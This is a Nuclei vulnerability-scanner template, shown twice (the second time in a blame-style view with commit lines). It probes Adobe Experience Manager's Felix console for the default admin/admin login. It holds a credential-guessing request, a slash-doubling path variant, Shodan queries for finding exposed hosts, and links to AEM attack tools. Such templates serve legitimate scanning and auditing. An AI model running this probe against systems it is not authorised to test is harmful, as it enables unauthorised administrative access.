dddd/common/config/pocs/aem-felix-console.yaml

id: aem-felix-console

info:
  name: Adobe Experience Manager Felix Console - Default Login
  author: DhiyaneshDk
  severity: high
  description: Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle.
  reference:
    - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
    - https://github.com/0ang3el/aem-rce-bundle
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 2
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: default-login,misconfig,aem,adobe

http:
  - method: GET
    path:
      - "{{BaseURL}}/system/console/bundles"
      - "{{BaseURL}}///system///console///bundles"

    headers:
      Authorization: Basic {{base64(username + ':' + password)}}
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Adobe Experience Manager Web Console - Bundles</title>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a004730450220257951b21ffea54e205cda7777f91079063d023abdbeb0e604283a9754c7c139022100e814c7ecc114292caeba6e33d7b0edbe6ce91f3baeb0deec1b5dd1f16a78fd28:922c64590222798bb761d5b6d8e72950
dddd 2023-08-18 08:55:46 +02:00			`id: aem-felix-console`

			`info:`
			`name: Adobe Experience Manager Felix Console - Default Login`
			`author: DhiyaneshDk`
			`severity: high`
			`description: Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle.`
			`reference:`
			`- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py`
			`- https://github.com/0ang3el/aem-rce-bundle`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L`
			`cvss-score: 8.3`
			`cwe-id: CWE-522`
			`metadata:`
			`max-request: 2`
			`shodan-query:`
			`- http.title:"AEM Sign In"`
			`- http.component:"Adobe Experience Manager"`
			`tags: default-login,misconfig,aem,adobe`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/system/console/bundles"`
			`- "{{BaseURL}}///system///console///bundles"`
nuclei v3.0.2 && 更新poc 2023-11-01 09:00:03 +01:00
dddd 2023-08-18 08:55:46 +02:00			`headers:`
			`Authorization: Basic {{base64(username + ':' + password)}}`
			`attack: pitchfork`
			`payloads:`
			`username:`
			`- admin`
			`password:`
			`- admin`
			`stop-at-first-match: true`
nuclei v3.0.2 && 更新poc 2023-11-01 09:00:03 +01:00
dddd 2023-08-18 08:55:46 +02:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "<title>Adobe Experience Manager Web Console - Bundles</title>"`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`
nuclei v3.0.2 && 更新poc 2023-11-01 09:00:03 +01:00
			`# digest: 4a0a004730450220257951b21ffea54e205cda7777f91079063d023abdbeb0e604283a9754c7c139022100e814c7ecc114292caeba6e33d7b0edbe6ce91f3baeb0deec1b5dd1f16a78fd28:922c64590222798bb761d5b6d8e72950`